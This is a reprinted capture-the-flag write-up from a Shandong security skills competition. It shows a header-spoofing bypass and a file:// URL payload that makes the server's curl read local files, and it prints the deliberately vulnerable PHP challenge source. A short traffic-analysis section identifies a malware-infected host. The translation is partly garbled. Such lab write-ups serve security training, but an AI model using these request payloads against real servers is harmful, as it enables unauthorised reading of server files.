Shandong Province Network and Information Security and Management Administrator Vocational Skills Competition Writeup

Leave a Comment / / Hi

Original link: https://5ime.cn/2022-sd.html

Web

Open the environment comment prompts to access robots.txt

image-20220901122715258

After accessing robots.txt , you will get two files source.php and flag.php . Accessing source.php prompts post to pass admin

image-20220901122827197

Just tried the commit and got only 127.0.0.1 can get the flag!!

 1
 
 admin = 1

image-20220901123022085

Simply fuzz it, add the X-Client-ip header directly, and get you need post url: http://www.ichunqiu.com

image-20220901123128398

Get a picture after submitting

 1
 
 admin= 1 &url=http: //www.ichunqiu.com

image-20220901123258339

Image without any echo

image-20220901123339849

We consider a pseudo-protocol to try and get the flag

 1
 
 admin= 1 &url=file: // www.ichunqiu.com /var/ www /html/ flag.php

image-20220901123517728

image-20220901123504663

Also read the topic source code 2333

 1
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 twenty one
 twenty two
 twenty three
 twenty four
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 
 <?php
 error_reporting ( 0 );
 include "flag.php" ;
 echo "you need to login as admin!" ;
 echo "<!-- post param 'admin' -->" ;
 if ( isset ( $_POST [ 'admin' ]))
 {
 if ( $_POST [ 'admin' ]== 1 )
 {
 if ( $_SERVER [ 'HTTP_X_CLIENT_IP' ])
 {
 if ( isset ( $_POST [ 'url' ]) && parse_url ( $_POST [ 'url' ])[ 'host' ]== 'www.ichunqiu.com' )
 {
 $curl = curl_init ();
 curl_setopt ( $curl , CURLOPT_URL, $_POST [ 'url' ]);
 curl_setopt ( $curl , CURLOPT_RETURNTRANSFER, 1 );
 $content = curl_exec ( $curl );
 curl_close ( $curl );
 $filename = 'download/' . rand (). ';img1.jpg' ;
 file_put_contents ( $filename , $content );
 echo $_POST [ 'url' ];
 $img = "<img src=\"" . $filename . "\"/>" ;
 echo $img ;
 }
 else
 {
 echo "you need post url: http://www.ichunqiu.com" ;
 }
 }
 else
 {
 echo "only 127.0.0.1 can get the flag!!" ;
 }
 }

 }
 else
 {
 $_POST [ 'admin' ]= 0 ;
 }

 ?>

Misc

Through traffic analysis, it is found that the ip address format of Windows infected by malicious virus is flag{}

172.16.165.165

image-20220901125838868

Through traffic analysis, it is found that the hostname format of Windows infected by malicious virus is flag{}

K34EN6W3N-PC

image-20220901125806463

Through traffic analysis, it is found that the number of vulnerabilities exploited by malicious viruses infected Windows is flag{}

image-20220901131048799

Through the online analysis of the exported HTTP content through the microstep sandbox, two cve , CVE-2012-0507 and CVE-2014-0569 . He said that they were successfully used, so it should be the latter.

This article is reprinted from: https://5ime.cn/2022-sd.html
This site is for inclusion only, and the copyright belongs to the original author.

Leave a Comment